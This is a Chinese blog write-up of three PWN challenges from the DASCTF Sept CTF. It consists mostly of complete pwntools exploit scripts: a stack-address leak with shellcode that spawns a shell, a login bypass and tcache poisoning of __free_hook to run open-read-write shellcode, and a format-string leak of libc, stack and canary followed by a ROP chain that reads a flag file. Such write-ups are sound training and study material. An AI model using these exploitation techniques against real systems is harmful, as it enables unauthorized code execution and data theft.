首页 > 其他分享 >[复现]DASCTF Sept X 浙江工业大学秋季挑战赛-PWN

[复现]DASCTF Sept X 浙江工业大学秋季挑战赛-PWN

时间:2022-11-23 10:02:47浏览次数:47  
标签:p64 Sept add libcbase str PWN DASCTF data lambda

hehepwn

一开始泄露stack地址,然后写入shellcode返回到shellcode执行

from pwn import *

context.os = 'linux'
context.log_level = "debug"
context.arch = 'amd64'

p = process('./bypwn')#, env={"LD_PRELOAD":'./libc-2.27.so'})
#libc = ELF('./libc-2.27.so')
elf = ELF('./bypwn')

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

def debug():
	gdb.attach(p)
	pause()

pl = 'a'*0x1f
sla('well you input:\n',pl)
ru('a'*0x1f+'\n')
stack = uu64(r(6)) - 0x50
leak('stack',stack)
shellcode=asm(shellcraft.sh())
pl = shellcode
pl = pl.ljust(0x58,'\x00')
pl += p64(stack)
p.sendlineafter('EASY PWN PWN PWN~\n',pl)
itr()

image

datasystem

有一个登录的界面

image

看特征应该是md5的emmm

参考上一个文章的绕过方法,绕过login

image

这里找到了溢出点,有沙盒就就就打有执行权限的地方写为shellcode,之后再打freehook调用shellcode

from pwn import *

context.os = 'linux'
context.log_level = "debug"
context.arch = 'amd64'

p = process('./datasystem')#, env={"LD_PRELOAD":'./libc-2.27.so'})
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./datasystem')

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

def debug():
	gdb.attach(p)
	pause()

def add(size, content):
    sla(">> :", 1)
    sla("Size:", str(size))
    sa("Content:", content)

def edit(idx, content):
    sla(">> :",3)
    sla("Index:", str(idx))
    sa("Content:", content)

def delete(idx):
    sla(">> :",2)
    sla("Index:", str(idx))

def show(idx):
    sla(">> :",3)
    sla("Index:", str(idx))


sa("please input username: ", "admin")
sa("please input password: ", "gB" + '\x00' * 0x1e)

add(0x10,'a'*0x10)#0
add(0x430, 'bpc')#1
add(0x10, 'bpc')#2
delete(1)
delete(0)
add(0x10, 0x20*'a')#0
show(0)
ru('a'*0x20)
libcbase = uu64(r(6)) - 0x3EBCA0
leak('libcbase',libcbase)
gg = libcbase + 0x15B066
opent = libcbase + libc.sym['open']
read = libcbase + libc.sym['read']
puts = libcbase + libc.sym['puts']
free = libcbase + libc.sym['__free_hook']
rdi = libcbase + 0x000000000002164f
rdx = libcbase + 0x0000000000001b96
rsi = libcbase + 0x0000000000023a6a

mmap = 0x23330000

delete(0)
add(0x10, 0x10 * 'a' + p64(0) + p64(0x441))#0
add(0x40,'bpc')#1
add(0x40,'bpc')#3
add(0x40,'bpc')#4
delete(4)
delete(3)
delete(1)
add(0x40,0x40*'a'+p64(0) + p64(0x51) + p64(mmap))#1
add(0x40,'bpc')#3
shellcode = asm('''
	sub rsp, 0x800
	push 0x67616c66
	mov rdi, rsp
	xor esi, esi
	mov eax, 2
	syscall

	cmp eax, 0
	js failed

	mov edi, eax
	mov rsi, rsp
	mov edx, 0x100
	xor eax, eax
	syscall

	mov edx, eax
	mov rsi, rsp
	mov edi, 1
	mov eax, edi
	syscall

	jmp exit

	failed:
	push 0x6c696166
	mov edi, 1
	mov rsi, rsp
	mov edx, 4
	mov eax, edi
	syscall

	exit:
	xor edi, edi
	mov eax, 231
	syscall
	''')
add(0x40,shellcode)#4
add(0x40,'bpc')#5
add(0x40,'bpc')#6
add(0x40,'bpc')#7
delete(7)
delete(6)
delete(5)
add(0x40,0x40*'a'+p64(0) + p64(0x51) + p64(free))#5
add(0x40,'bpc')#6
add(0x40,p64(mmap))#7
delete(6)
#debug()
itr()

image

hahapwn

image

有沙盒

image

然后看welcome,有格式化字符串漏洞,还有一个栈溢出的漏洞

第一次格式化字符串漏洞leak stack、libc、canary剩下的就是正常进行的orw了

from pwn import *

context.os = 'linux'
context.log_level = "debug"
context.arch = 'amd64'

p = process('./pwn')#, env={"LD_PRELOAD":'./libc-2.27.so'})
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./pwn')

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

def debug():
	gdb.attach(p)
	pause()
pl = '%9$p-%12$p-%27$p'
sla('Welcome! What is your name?\n',pl)
ru('Hello \n')
libcbase = int(r(14),16) - 0x61C710
leak('libcbase',libcbase)
ru('-')
stack = int(r(14),16) - 0x20
leak('stack',stack)
ru('-')
canary = int(r(18),16)
leak('canary',canary)
opent = libcbase + libc.sym['open']
read = libcbase + libc.sym['read']
puts = libcbase + libc.sym['puts']
rdi = libcbase + 0x000000000002164f
rsi = libcbase + 0x0000000000023a6a
rdx = libcbase + 0x0000000000001b96
pl = './flag\x00\x00'
pl = pl.ljust(0x68,'\x00')
pl += p64(canary)
pl += 'bcatbcat'
pl += p64(rdi) + p64(stack) + p64(rsi) + p64(0) + p64(rdx) + p64(0) + p64(opent)
pl += p64(rdi) + p64(3) + p64(rsi) + p64(0x601160) + p64(rdx) + p64(0x30) + p64(read)
pl += p64(rdi) + p64(0x601160) + p64(puts)
p.sendlineafter('What can we help you?\n',pl)

#debug()

itr()

image

标签:p64,Sept,add,libcbase,str,PWN,DASCTF,data,lambda
From: https://www.cnblogs.com/bpcat/p/16917324.html

相关文章

  • UNCTF2022 pwn
    welcomeUNCTF2022nc好耶,直接输入UNCTF&2022​即可‍石头剪刀布一道经典的伪随机数题sla('(y/n)\n','y')libc.srand(0xa)rand=['0','0','1','1','2','1','1','0',......
  • [复现]2021DASCTF实战精英夏令营暨DASCTF July X CBCTF-PWN
    EasyHeap想可执行的地方写入orw的shellcode,利用tcachebin的df进行劫持malloc_hook然后调用add来触发。frompwnimport*context.os='linux'context.log_level="......
  • pwn之ret2syscall
    目录syscall介绍系统调用号ret2syscall介绍判断步骤例题Rop[简单系统调用]思路EXPRet2sys[多系统函数调用]思路EXPRet2sys[64位寄存器]思路EXPsyscall介绍函数系统调用,......
  • unctf2022pwn所有题wp
    unctf2022_pwn_all_wpwelcomeUNCTF2022sl("UNCTF&2022")石头剪刀布预测随机数#!/usr/bin/envpython3'''Author:7resp4ssDate:2022-11-1302:17:09LastEditT......
  • ARM架构下pwn的csu利用
    ‍arm架构下的csu利用与x86架构下的有很多相似的点x86:​arm:​‍首先看一下gadget1:​LDPX19,X20,[SP,#var_s10]LDPX21,X22,[SP......
  • DASCTF 2022.10 部分re wp
    就做了俩re贪玩ctfwinmain!随便测试输入知道有弹窗x64dbg直接为messbox下断查找调用找到这为checkpassword和account的函数两个比较上面为直接异或的加密过程......
  • [复现]2021VNCTF-pwn
    hh这个vmpwn就不做了叭,好麻烦White_Give_Flag这里是申请了一个随机大小的堆块​先是把flag读进heap里面,然后free掉,进入程序看发现进入菜单之前,flag在topheap中,只要申......
  • BUUCTF-pwn专题
    buuctf栈溢出ripret2text,返回到代码中本来就有的恶意函数拿到附件后,首先进程checksecRELRO:RELRO会有PartialRELRO和FULLRELRO,如果开启FULLRELRO,意味着我们无法......
  • 祥云杯2022-部分pwn复现
    1.bitheap2.27限制数量0xf、限制大小0x200、无UAFadd:存在一个off-by-oneedit:输入内容时,edit会把2进制转成16进制然后按位取反foriinrange(12): add(i,0xf8)f......
  • DASCTF X GFCTF 2022十月挑战赛 pwn R()P
    R()P⾼版本上GCC编译的程序,没有csu这种好⽤的gadget可以⽤由于是优化过的编译,没有rbp链,⻓度参数通过rsp取得,地址通过rax取得这就给了我们直接控制read的可能,可以直接......